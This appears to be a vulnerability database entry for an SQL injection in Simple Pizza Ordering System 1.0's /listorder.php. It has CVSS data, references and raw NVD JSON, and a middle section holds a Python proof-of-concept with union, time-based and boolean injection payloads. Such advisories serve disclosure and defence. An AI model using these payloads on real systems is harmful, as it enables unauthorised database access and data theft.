CVE-2025-13323

Description

A security flaw has been discovered in code-projects Simple Pizza Ordering System 1.0. Affected is an unknown function of the file /listorder.php. Performing manipulation of the argument ID results in sql injection. The attack can be initiated remotely. The exploit has been released to the public and may be exploited.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:carmelo:simple_pizza_ordering_system:1.0:*:*:*:*:*:*:* - VULNERABLE

Simple Pizza Ordering System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-13323 SQL Injection PoC
# Target: Simple Pizza Ordering System 1.0
# File: /listorder.php
# Parameter: ID

import requests
import sys

target_url = "http://target.com/listorder.php"

# Basic SQL Injection test payloads
payloads = [
    "1' OR '1'='1",  # Basic bypass
    "1' UNION SELECT 1,2,3,4,5,6-- -",  # Union-based injection
    "1' AND SLEEP(5)-- -",  # Time-based blind injection
    "1' AND (SELECT COUNT(*) FROM users)>0-- -",  # Boolean-based injection
]

def test_sql_injection(url, param='ID'):
    print(f"[*] Testing SQL Injection on {url}")
    print(f"[*] Parameter: {param}")
    
    for payload in payloads:
        try:
            params = {param: payload}
            response = requests.get(url, params=params, timeout=10)
            
            print(f"\n[+] Testing payload: {payload}")
            print(f"    Status Code: {response.status_code}")
            print(f"    Response Length: {len(response.text)}")
            
            # Check for SQL error indicators
            sql_errors = ['mysql', 'sql', 'syntax', 'warning', 'error']
            for error in sql_errors:
                if error.lower() in response.text.lower():
                    print(f"    [!] Potential SQL Error detected!")
                    break
                    
        except requests.exceptions.RequestException as e:
            print(f"[-] Error: {e}")

# Database enumeration example
def extract_database_info(url):
    print("\n[*] Extracting database information...")
    
    # Get database version
    version_payload = "1' UNION SELECT 1,@@version,3,4,5,6-- -"
    # Get current database
    db_payload = "1' UNION SELECT 1,database(),3,4,5,6-- -"
    # Get users
    users_payload = "1' UNION SELECT 1,user(),3,4,5,6-- -"
    
    print(f"[*] Version payload: {version_payload}")
    print(f"[*] Database payload: {db_payload}")
    print(f"[*] Users payload: {users_payload}")

if __name__ == "__main__":
    if len(sys.argv) > 1:
        target_url = sys.argv[1]
    
    test_sql_injection(target_url)
    extract_database_info(target_url)
    print("\n[*] PoC completed. Further exploitation depends on specific environment.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13323
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13323
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13323/
[4] VulDB https://vuldb.com/cve/CVE-2025-13323
[5] https://code-projects.org/
[6] https://github.com/daojian1/Simple-Pizza-Ordering-System_V1.0_003
[7] https://vuldb.com/?ctiid.332662
[8] https://vuldb.com/?id.332662
[9] https://vuldb.com/?submit.691844

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13323", "sourceIdentifier": "[email protected]", "published": "2025-11-18T00:15:48.603", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in code-projects Simple Pizza Ordering System 1.0. Affected is an unknown function of the file /listorder.php. Performing manipulation of the argument ID results in sql injection. The attack can be initiated remotely. The exploit has been released to the public and may be exploited."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:carmelo:simple_pizza_ordering_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "B9EC497F-6085-4BEA-90C3-F623DCCFE901"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/daojian1/Simple-Pizza-Ordering-System_V1.0_003", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.332662", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.332662", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.691844", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}